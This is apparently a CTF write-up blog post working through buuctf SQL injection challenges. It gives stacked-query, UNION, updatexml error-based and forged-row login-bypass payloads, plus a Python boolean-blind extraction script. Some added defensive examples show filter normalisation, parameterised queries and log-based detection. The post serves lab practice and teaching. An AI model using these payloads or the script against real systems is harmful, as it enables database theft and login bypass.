【buuctf】web: SQL Injection


Brief note

Notes from working through the SQL injection challenges in buuctf web; the easy ones are not written up.

[强网杯 2019]随便注

1. Universal password injection

1';rename table words to words2; 
rename table `1919810931114514` to `words`;
alter table words change flag id varchar(100);
show tables;
show columns from words;#

[极客大挑战 2019]LoveSQL

1. Universal password injection

' or 1=1 #

2. Find the number of columns

' order by 3 #

' union select 1,2,3; # find which columns are echoed

2' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #

3. Dump tables

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser' #

2' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #

2' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #

2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) ffromrom l0ve1ysq1 #
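The doubled keywords in the last payload defeat a filter that deletes blacklisted words in a single pass. As an added defensive illustration (not code from this post; the blacklist union/select/from is assumed from the doubled words), this Python compares single-pass stripping with stripping to a fixpoint and rejects input that only becomes clean after normalisation, since repairing input is no substitute for parameterised queries.

```python
import re

# Assumed blacklist, inferred from the doubled words in the page's payload
# (uunionnion, sselectelect, ffromrom); not the challenge's real filter.
BLOCKED = ("union", "select", "from")

def strip_once(s):
    """Single-pass deletion, e.g. str.replace(kw, ''): what doubling defeats."""
    for kw in BLOCKED:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s

def strip_to_fixpoint(s):
    """Repeat the deletion until nothing changes: 'uunionnion' -> 'union' -> ''."""
    while True:
        out = strip_once(s)
        if out == s:
            return out
        s = out

def needs_rejecting(s):
    """Defender's check: anything that changes under full normalisation carried a
    blocked word, possibly hidden by doubling. Reject it rather than sanitise it."""
    return strip_to_fixpoint(s) != s

# The page's bypass payload, used here only as test input.
PAGE_PAYLOAD = ("2' uunionnion sselectelect 1,2,group_concat(id,username,passwoordd) "
                "ffromrom l0ve1ysq1 #")

if __name__ == "__main__":
    print("single pass :", strip_once(PAGE_PAYLOAD))       # keywords reappear
    print("fixpoint    :", strip_to_fixpoint(PAGE_PAYLOAD))  # keywords gone
    print("reject?     :", needs_rejecting(PAGE_PAYLOAD))    # True
```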

[极客大挑战 2019]HardSQL

1. Build and send test parameters with HackBar

2. Test which parameters and characters are filtered

3. Dump the database and tables

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(database()))),1))%23

4. Dump tables

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))%23

5. Dump columns

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))%23

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1))),1))%23

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(password)))from(H4rDsq1))),1))%23

Left half: flag{dc3aeb0f-4601-4e42-96da-71

http://f232a01e-3c9d-480d-bd28-439ce083b5f6.node3.buuoj.cn/check.php
?username=admin
&password= admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1))),1))%23

Left half (updatexml's error message shows at most 32 characters, so the flag is read in two halves): flag{dc3aeb0f-4601-4e42-96da-71
Right half, read with right(password,30): f-4601-4e42-96da-718fe313ce10}
Compare and drop the overlapping part: 8fe313ce10}
flag{dc3aeb0f-4601-4e42-96da-718fe313ce10}

[GXYCTF2019]BabySQli

1. Test the injection point

2. The page source contains a string that decodes with base32 and then base64; decoding it gives:

select * from user where username = '$name'

From this we know there is a user table.

3. Find the number of columns with order by

4. Use a union query to create a virtual row and log in

name=1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'#&pw=admin

The tricky part here is that nothing hints that the password is compared as an MD5 hash.
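The bypass above works because the application compares md5(password) against whatever row the query returned, and the UNION row is under the attacker's control. Added example, not the challenge's source: a constructed SQLite user table (columns id, username, password are assumed) with the string-built query from the decoded hint beside a parameterised one; SQLite has no # comment, so the forged row here ends with -- instead.

```python
import hashlib
import sqlite3

def make_db():
    """Constructed stand-in for the challenge's user table (column names assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table user (id integer, username text, password text)")
    real_hash = hashlib.md5(b"n0t-the-password").hexdigest()
    db.execute("insert into user values (1, 'admin', ?)", (real_hash,))
    return db

def login_vulnerable(db, name, pw):
    """Builds the query exactly like the decoded hint: username = '$name'."""
    sql = "select * from user where username = '%s'" % name
    row = db.execute(sql).fetchone()
    # The app hashes the submitted password and compares it with the row it got
    # back, so a UNION row carrying md5('admin') passes without a real credential.
    return row is not None and row[2] == hashlib.md5(pw.encode()).hexdigest()

def login_fixed(db, name, pw):
    """Same check, but the username is a bound parameter, never part of the SQL."""
    row = db.execute("select * from user where username = ?", (name,)).fetchone()
    return row is not None and row[2] == hashlib.md5(pw.encode()).hexdigest()

# The page's forged-row payload; its trailing '#' is a MySQL comment, SQLite needs '-- '.
FORGED_ROW = "1' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3'-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, FORGED_ROW, "admin"))  # True
    print("fixed:     ", login_fixed(db, FORGED_ROW, "admin"))       # False
```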

[极客大挑战 2019]FinalSQL

1. The last challenge is usually hard; the hint above says to use blind injection

2. Try it out

1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1

Manual injection is too tedious, so I took a script found online:

import requests
import time

url = "http://83091d3b-98bc-4cb3-857f-b7ff224e4257.node3.buuoj.cn/search.php?"
temp = {"id": ""}
column = ""
for i in range(1, 1000):          # i-th character of the result
    time.sleep(0.06)
    low = 32                      # binary search over printable ASCII
    high = 128
    mid = (low + high) // 2
    while low < high:
        # Contents (active): the password column of F1naI1y
        temp["id"] = "1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
        # Table names
        # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" % (i, mid)
        # Column names
        # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" % (i, mid)
        r = requests.get(url, params=temp)
        time.sleep(0.04)
        print(low, high, mid, ":")
        if "Click" in r.text:     # normal page came back, i.e. the condition held
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if mid == 32 or mid == 127:   # no more characters to read
        break
    column += chr(mid)
    print(column)

print("All:", column)

Result:
All: cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{15c4b1bf-0f2a-4b60-8063-07d6f687a332}
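Both the updatexml extraction earlier in this post and the boolean-blind loop above leave a characteristic trail in the web server's access log. Added example, not from the post: a detector over constructed combined-format log lines that URL-decodes each request and flags clients that send error-based payloads or a burst of ascii(substr(...)) probes; thresholds and sample addresses are assumed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Boolean-blind probing (ascii(substr(...)) compared with a constant) and
# updatexml/extractvalue error-based extraction. Whitespace is optional because
# the payloads on this page avoid spaces entirely.
BLIND_PROBE = re.compile(r"ascii\s*\(\s*substr\s*\(.*?\)\s*[<>=]\s*\d+", re.I | re.S)
ERROR_BASED = re.compile(r"(updatexml|extractvalue)\s*\(", re.I)
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log; the 10.0.0.5 requests mirror the binary-search loop above.
SAMPLE_LOG = """\
10.0.0.5 - - [22/May/2021:20:10:35 +0800] "GET /search.php?id=1%5E%28ascii%28substr%28%28select%28group_concat%28schema_name%29%29from%28information_schema.schemata%29%29%2C1%2C1%29%29%3E79%29%5E1 HTTP/1.1" 200 512
10.0.0.5 - - [22/May/2021:20:10:35 +0800] "GET /search.php?id=1%5E%28ascii%28substr%28%28select%28group_concat%28schema_name%29%29from%28information_schema.schemata%29%29%2C1%2C1%29%29%3E103%29%5E1 HTTP/1.1" 200 512
10.0.0.5 - - [22/May/2021:20:10:36 +0800] "GET /search.php?id=1%5E%28ascii%28substr%28%28select%28group_concat%28schema_name%29%29from%28information_schema.schemata%29%29%2C1%2C1%29%29%3E115%29%5E1 HTTP/1.1" 200 512
10.0.0.9 - - [19/May/2021:19:36:47 +0800] "GET /check.php?username=admin&password=admin%27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28database%28%29%29%29%2C1%29%29%23 HTTP/1.1" 200 231
192.168.1.20 - - [22/May/2021:20:11:02 +0800] "GET /search.php?id=1 HTTP/1.1" 200 412
"""

def classify(request_path):
    """Return 'blind', 'error-based' or None for one decoded request path."""
    decoded = unquote_plus(request_path)
    if BLIND_PROBE.search(decoded):
        return "blind"
    if ERROR_BASED.search(decoded):
        return "error-based"
    return None

def scan(lines, blind_threshold=3):
    """Map ip -> {technique: count} for clients at or above the blind-probe burst
    threshold or with any error-based hit; a single blind probe alone is not reported."""
    hits = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        kind = classify(m["path"])
        if kind:
            hits.setdefault(m["ip"], Counter())[kind] += 1
    return {ip: dict(c) for ip, c in hits.items()
            if c["blind"] >= blind_threshold or c["error-based"] > 0}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG.splitlines()))
```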

mochu7"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

flag{06534856-955b-41e7-a415-933d31e2b3f4}
}4f3b2e13d339-514a-7e14-b559-65
3d31e2b3f4}

Title: 【buuctf】web: SQL Injection

Author: 孤桜懶契

Published: May 19, 2021 - 09:23:14

Last updated: October 20, 2021 - 13:22:06

Original link: https://gylq.gitee.io/posts/73.html

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.